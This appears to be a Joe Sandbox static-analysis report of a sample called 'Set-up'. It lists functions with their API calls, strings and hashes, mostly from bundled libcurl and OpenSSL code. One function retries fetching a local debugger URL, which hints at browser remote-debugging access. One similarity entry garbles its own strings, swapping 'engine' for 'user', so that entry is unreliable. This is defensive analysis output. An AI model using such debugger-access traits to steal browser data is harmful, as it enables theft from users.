String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 8.10.1%sQUIT$CLIENT libcurl 8.10.1DEFINE %s %sQUIT$CLIENT libcurl 8.10.1MATCH %s %s %sQUIT$Failed sending DICT request$default$dict.c$lookup word is missing
API String ID: 842768466-2079990832
Opcode ID: d97cc28c43673620b1e17fd789b482d24bc0d68a33bc3878db6d04ee6491fe32
Instruction ID: af9a3234ec0a55d754a6f65d9fa70e47c1549310a3bb835322d600ea95aa5f65
Opcode Fuzzy Hash: d97cc28c43673620b1e17fd789b482d24bc0d68a33bc3878db6d04ee6491fe32
Instruction Fuzzy Hash: B0A17E61E243862AE7312A345D0ABBE7AD95F71708F080074FD45D62C3FAA5DDF5C2A1

Function 0024C350 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 166stringnetworkCOMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 0024C37A
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 0024C476
WSAGetLastError.WS2_32 ref: 0024C4AE

Strings

erro, xrefs: 0024C568
SSL_ERROR_SYSCALL, xrefs: 0024C4F5
check password, OpenSSL error %s, xrefs: 0024C3AD
own , xrefs: 0024C570
No error, xrefs: 0024C463
SSL_ERROR unknown, xrefs: 0024C502, 0024C524
unknown, xrefs: 0024C374
QUIC connect: %s in connection to %s:%d (%s), xrefs: 0024C525
SSL certificate problem: %s, xrefs: 0024C420
SSL certificate verification failed, xrefs: 0024C582
Unkn, xrefs: 0024C578
Unknown error, xrefs: 0024C468, 0024C474
r, xrefs: 0024C561
QUIC connection has been shut down, xrefs: 0024C3D1

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ErrorLastmemcpystrcpy
String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$check password, OpenSSL error %s$erro$own $r$unknown
API String ID: 31095072-970686540
Opcode ID: aeecf0e96b5b60ec7d486bdbd7e946f9e990ed7742610316e7c729af64c34737
Instruction ID: 9e4539b48f338809ef6c7ea3536eb01fbe66a23cf74e6f657388f922df054dbb
Opcode Fuzzy Hash: aeecf0e96b5b60ec7d486bdbd7e946f9e990ed7742610316e7c729af64c34737
Instruction Fuzzy Hash: 41517BB19283405FD710AF58DC05B6FBB90EFD1314F54442DF988DB282D6B9D864CB92

Function 00224830 Relevance: 25.8, APIs: 1, Strings: 16, Instructions: 267stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00224AE0

Part of subcall function 001D6C30: strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000003F), ref: 001D6CF3

Strings

%s:%s, xrefs: 00224ACC
http.c, xrefs: 002249C0, 00224AFE, 00224B2A, 00224B69, 00224B85
Proxy-, xrefs: 00224B43
AWS_SIGV4, xrefs: 002248B0
Basic, xrefs: 00224B98
,, xrefs: 00224A86
Authorization, xrefs: 00224974, 002249AA
Server, xrefs: 00224A2C, 00224A53
Proxy-authorization, xrefs: 0022491D
Proxy, xrefs: 00224A27
%sAuthorization: Basic %s, xrefs: 00224B59
Bearer, xrefs: 002249F3
%s auth using %s with user '%s', xrefs: 00224A54
Digest, xrefs: 00224879
NTLM, xrefs: 0022495E, 00224A52
Authorization: Bearer %s, xrefs: 002249DE

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strchrstrlen
String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$,$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Proxy$Proxy-$Proxy-authorization$Server$http.c
API String ID: 986617436-2322216787
Opcode ID: 970cda9de3876999bd456c0124adc963c39aabda13fa25f806d6627adacece47
Instruction ID: 23d205a17d5fa91e90104896e64f8205a94866b0fd6f675104ecc0f24bb36c8a
Opcode Fuzzy Hash: 970cda9de3876999bd456c0124adc963c39aabda13fa25f806d6627adacece47
Instruction Fuzzy Hash: EF9113B0A243257BEB307EA4BC51B7B36D49B84344F044439FE99CA381F6B9DD249762

Function 002623C0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 277COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_buf_avail(buf) >= datamax,nghttp2_session.c,00001E56), ref: 002625EA
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(bufs->head == bufs->cur,nghttp2_session.c,00001E22,FFFFFE38,00000000), ref: 002626C7
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00804188,nghttp2_session.c,00001E67), ref: 002626DC
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(&session->aob.framebufs == bufs,nghttp2_session.c,00001E4D), ref: 002626F1
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS,nghttp2_session.c,00000438), ref: 00262706
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_session.c,00000446), ref: 0026271B

Strings

nghttp2_session.c, xrefs: 002625E0, 002626BD, 002626D2, 002626E7, 002626FC, 00262711
bufs->head == bufs->cur, xrefs: 002626C2
0 == rv, xrefs: 00262716
&session->aob.framebufs == bufs, xrefs: 002626EC
urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS, xrefs: 00262701
nghttp2_buf_avail(buf) >= datamax, xrefs: 002625E5

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: &session->aob.framebufs == bufs$0 == rv$bufs->head == bufs->cur$nghttp2_buf_avail(buf) >= datamax$nghttp2_session.c$urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS
API String ID: 1222420520-4202471155
Opcode ID: 983a744e6e4a5f69379a359c0f450e854bd5250ac2901b9477f6db9a49c527b9
Instruction ID: e5eb123f15cd177030160166edced115b4fe4d155015be2395fc01729e744476
Opcode Fuzzy Hash: 983a744e6e4a5f69379a359c0f450e854bd5250ac2901b9477f6db9a49c527b9
Instruction Fuzzy Hash: 5AA10371214B42DFDB15CF24CC81B6ABBA6FF84304F14856CF8998B292D771D8A9CB91

Function 002325D0 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 295COMMON

Download Yara Rule

Strings

TTLS, xrefs: 00232846
STARTTLS not available., xrefs: 00233094
STARTTLS, xrefs: 00232D47
L-IR, xrefs: 0023289C
LOGINDISABLED, xrefs: 00232867
STAR, xrefs: 0023283C
PREAUTH connection, already authenticated, xrefs: 00232770
STARTTLS denied, xrefs: 00233068
SASL, xrefs: 00232892
CAPABILITY, xrefs: 00232797
Got unexpected imap-server response, xrefs: 00233034
AUTH, xrefs: 002328C5

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
API String ID: 0-3171374047
Opcode ID: 5c0918f692731a5b4f2c2e986fbb1c684fa6e28695304109373bcf191bf9f8fe
Instruction ID: d13bf83dbc027aafdabf220caba4e47a89811647d5ba110d481c7cf1b9ff49fa
Opcode Fuzzy Hash: 5c0918f692731a5b4f2c2e986fbb1c684fa6e28695304109373bcf191bf9f8fe
Instruction Fuzzy Hash: FEB169F1A24302DBDB25CF14C881B7AB3A4BF55714F140129E84947242E775AFA8DB92

Function 001D20AD Relevance: 19.6, APIs: 3, Strings: 10, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D20D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D22D0

Strings

Failed to allocate memory for response., xrefs: 001D20F1
@, xrefs: 001D21F2
http://localhost:%d/json, xrefs: 001D2170
Attempt %d failed: %s, xrefs: 001D229F
GET request succeeded on attempt %d., xrefs: 001D225D
Q, xrefs: 001D2213
d, xrefs: 001D2178
Failed to initialize curl., xrefs: 001D213F
+N, xrefs: 001D21B1
All %d attempts to fetch debugger URL failed., xrefs: 001D22EF

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: freemalloc
String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
API String ID: 3061335427-1249806554
Opcode ID: 8e2d4bca01cdb8ad9442f924c7475ee5abca7456a656f4c1436e89ff36033566
Instruction ID: d7c627a275f990b8b96086c3056227b713eda97e0782439685990d49ec4f9bef
Opcode Fuzzy Hash: 8e2d4bca01cdb8ad9442f924c7475ee5abca7456a656f4c1436e89ff36033566
Instruction Fuzzy Hash: EE61C5B4909705EFDB00EFA8D48979EBBF0BF58314F01881EE598A7341D77899848F92

Function 003CA300 Relevance: 18.4, APIs: 2, Strings: 10, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 003CA61C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 003CA632

Part of subcall function 003CA0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,003CA654,?,PRIVATE KEY), ref: 003CA0BD
Part of subcall function 003CA0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 003CA0C8
Part of subcall function 003CA0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 003CA0DF

Part of subcall function 003438A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0034397E

Strings

PARAMETERS, xrefs: 003CA5CF
PUBLIC KEY, xrefs: 003CA5D4, 003CA5F1
PRIVATE KEY, xrefs: 003CA616, 003CA649
crypto/pem/pem_pkey.c, xrefs: 003CA555, 003CA802, 003CA831, 003CA85C, 003CA872
ENCRYPTED PRIVATE KEY, xrefs: 003CA62C
ANY PRIVATE KEY, xrefs: 003CA6B4
pem_read_bio_key_legacy, xrefs: 003CA7F8, 003CA827
check password, OpenSSL error %s, xrefs: 003CA4D3
pem_read_bio_key_decoder, xrefs: 003CA54E
PEM, xrefs: 003CA3FF

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$check password, OpenSSL error %s$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
API String ID: 3853617425-2618078231
Opcode ID: 8504dde9869ff5b439f595cd3bee21d9b4c636396dbef10a9511c5e16ff6887a
Instruction ID: e1f12d0079403dcb705be1207bd84221076d824f755d7cce44e53473a5ca636f
Opcode Fuzzy Hash: 8504dde9869ff5b439f595cd3bee21d9b4c636396dbef10a9511c5e16ff6887a
Instruction Fuzzy Hash: 4FD10BB1A047056BE6237A609C03F2B76D9AF8074CF15482CFD58EA183FA75ED1487A3

Function 002261C0 Relevance: 18.2, APIs: 4, Strings: 8, Instructions: 234stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,127.0.0.1,?,?,00000000,00223DA5,?,?,?), ref: 00226267
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,::1,?,?,?,?,00000000,00223DA5,?,?,?), ref: 00226279
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0022631C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00223DA5,?,?), ref: 00226329

Strings

%s%s, xrefs: 002263BA
Cookie: , xrefs: 002262F8, 00226403
%s%s=%s, xrefs: 00226363
Restricted outgoing cookies due to header size, '%s' not sent, xrefs: 00226492
127.0.0.1, xrefs: 00226261
Cookie, xrefs: 002261DD
::1, xrefs: 00226273
localhost, xrefs: 00226250

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: %s%s$%s%s=%s$127.0.0.1$::1$Cookie$Cookie: $Restricted outgoing cookies due to header size, '%s' not sent$localhost
API String ID: 3853617425-1910649647
Opcode ID: e4773bbda37678b1357f562280887a5471451e51da39a717c44500de66670fc2
Instruction ID: 9a9ab60f5f9606ada85079864674fba4adaf8aeff6f6148b08d1140f03a52f08
Opcode Fuzzy Hash: e4773bbda37678b1357f562280887a5471451e51da39a717c44500de66670fc2
Instruction Fuzzy Hash: 69711972A24316BBD720AE90AC4AB3BB695AFD0744F05403CFD9497352EB71EC35C691

Function 00384580 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00248C0E,?), ref: 003845E3
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00248C0E,?), ref: 0038460A

Strings

DIR_LOAD, xrefs: 0038466A
LOAD, xrefs: 003846BA
OPENSSL_ENGINES, xrefs: 0038461C
/data/curl-i686/lib/engines-3, xrefs: 0038462B, 00384682
DIR_ADD, xrefs: 00384683
ENGINE_by_id, xrefs: 003846D5, 003846FA, 00384746
crypto/user/eng_list.c, xrefs: 003846DF, 00384704, 00384750
id=%s, xrefs: 0038475E
dynamic, xrefs: 00384604, 00384633
LIST_ADD, xrefs: 003846A0

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strcmp
String ID: /data/curl-i686/lib/users-3$DIR_ADD$DIR_LOAD$user_by_id$LIST_ADD$LOAD$OPENSSL_userS$crypto/user/eng_list.c$dynamic$id=%s
API String ID: 1004003707-1524119518
Opcode ID: 7281c7f0752d25171d85b2d9fa4cdcdde63cf295cd38c62ee633e79f67bed12b
Instruction ID: 4eaa6af3977ce138b06f79f22532a1e8b58d72718aa0d6de4b0d5ecbc5b24f50
Opcode Fuzzy Hash: 7281c7f0752d25171d85b2d9fa4cdcdde63cf295cd38c62ee633e79f67bed12b
Instruction Fuzzy Hash: 9F41A7B5B403256BE623B6742C07B2A2588DB52F49F1600A0FE24A9BC3F795D91487A2

Function 00236810 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00236884
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 002368AC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 002368C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00236973
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00236983
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00236995

Strings

[, xrefs: 002369E1

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpystrchr$atoistrlen
String ID: [
API String ID: 444251876-784033777
Opcode ID: d36b49535f51d6ac6e6556750627eb267a8a1e01df968587790cd9875555776d
Instruction ID: 526a15fdf1ee3afc934e8960f4a337e2a5ff04892f90719b5516f45ef870e8eb
Opcode Fuzzy Hash: d36b49535f51d6ac6e6556750627eb267a8a1e01df968587790cd9875555776d
Instruction Fuzzy Hash: 6EB16AF16383437BDB358E20889C73ABBDDEB55308F18C92EE8C5D6181E765C8648B52

Function 001D63F0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 255fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 001D6467

Strings

%s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 001D6540
%d%02d%02d %02d:%02d:%02d, xrefs: 001D66D5
unlimited, xrefs: 001D64A1
hsts.c, xrefs: 001D656B, 001D65CF
# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 001D6462
%s%s "%s", xrefs: 001D64AA
mite, xrefs: 001D6688

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
